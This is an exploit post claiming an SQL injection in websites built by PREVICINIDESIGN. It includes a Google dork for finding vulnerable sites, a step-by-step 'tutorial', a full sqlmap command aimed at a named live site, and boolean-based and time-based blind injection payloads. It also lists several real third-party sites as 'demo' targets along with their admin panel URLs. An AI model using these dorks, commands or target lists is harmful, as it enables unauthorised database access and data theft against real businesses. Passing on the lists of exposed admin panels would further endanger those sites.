################################################################################# # Exploit Title: CREDITS PREVICINIDESIGN Sql İnjection Vulnerability # Author : TrazeR & Sipahiler & TurkZ.org # Google Dork : intext:"CREDITS PREVICINIDESIGN" & inurl:id= Or Web by PREVICINIDESIGN & php?id= # Tested on : Kali Linux 2017 Chrome, Firefox # Date : 2017-12-01 # Vendor Home: http://www.previcinidesign.com/ # Blog : http://www.trazer.org/ # Forum : http://www.turkz.org/Forum/ # Telegram: https://t.me/turkzgrup ################################################################################# Tutorial : [+] Dorking İn Google Or Other Search Enggine [+] Open Target [+] Sqlmap And Manuel Command : root@TrazeR:~# sqlmap --level=5 --risk=3 --threads=10 --timeout=10 --random-agent --text-only -u "http://www.onoya.it/it/menu.php?idCat=25" --no-cast --batch --dbs Parameter: idCat (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: idCat=25 AND 3326=3326 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: idCat=25 AND SLEEP(5) Demo: http://www.onoya.it/it/menu.php?idCat=25 http://www.amarcordpiadineria.it/notizie-fresche.php?ID=15 http://www.osteopatiassociati.it/casi-scheda.php?ID=29 http://ibrubinetterie.com/eng/collezione-doccia-lista.php?ID=7 Manager: http://www.onoya.it/aps http://www.amarcordpiadineria.it/admin/ http://www.osteopatiassociati.it/admin/ http://ibrubinetterie.com/admin/ Greet'Zzz : Darkcod3r & EfendiBey & Atabey & TrazeR & Zer0day & Kutluhan & Göçebe & BlueTrojen Special Thanks TurkZ.org All Staff